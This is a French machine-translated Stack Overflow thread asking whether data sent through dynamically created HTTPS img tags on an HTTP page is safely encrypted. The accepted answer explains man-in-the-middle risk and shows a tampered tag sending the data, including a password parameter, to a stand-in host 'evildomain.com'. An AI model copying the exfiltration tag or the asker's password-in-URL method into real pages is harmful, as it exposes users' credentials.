http, https et by-pass ajax, peut-être?
https://stackoverflow.com/questions/1541329
-
20-09-2019 - |
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianQuestion
J'ai un script serveur que je dois transmettre des données à partir du navigateur sans recharger la page (alias ajax). Les données sont sensibles devrait donc être envoyé via https. La page est cependant sur la couche http. En raison de cette restriction de domaine / protocole, le navigateur ne permet pas.
Je pense à tricher un peu le système en créant dynamiquement des balises d'image et appeler le script en utilisant la balise src tels que:
<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />
Je voudrais savoir si ce sera effectivement correctement crypté.
La solution
Le problème est si la page elle-même est que HTTP, vous êtes sensible à un homme dans l'attaque du milieu. Un attaquant peut modifier simplement le script dans la page envoyé sur HTTP afin qu'il utilise à la place:
<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />
L'utilisateur sera cependant pas le plus sage. Pour contourner cela, vous avez vraiment besoin de servir la page HTTPS trop -. Qui permet de résoudre parfaitement votre autre problème en même temps
(C'est exactement la même raison pour laquelle les formulaires de connexion devraient être sur les pages HTTPS, plutôt que l'action de forme étant HTTPS).
Autres conseils
Oui et non.
La partie d'adresse du serveur de l'URL est évidemment pas crypté, car il est utilisé pour établir la connexion.
Tout le reste est crypté tout en étant envoyé via une connexion HTTPS. Mais toute personne qui consulte la source sera évidemment en mesure de voir les données affichées.
Il porte également mentionner que certains navigateurs ne seront pas affichés (ou avertira l'utilisateur avant d'afficher) en mode mixte (http vs https) pages HTML. Dans certains cas, cela peut ne pas fonctionner parce que l'utilisateur choisit de le bloquer.
Une alternative possible à la technique de l'image (l'inconvénient qui, comme mentionné par d'autres, est que le contenu en mode mixte n'est pas bien traité par certains navigateurs) serait par ASSL .
Les deux méthodes se traduira par un cryptage qui se passe, et les deux sont encore vulnérables à l'homme dans les attaques du milieu.
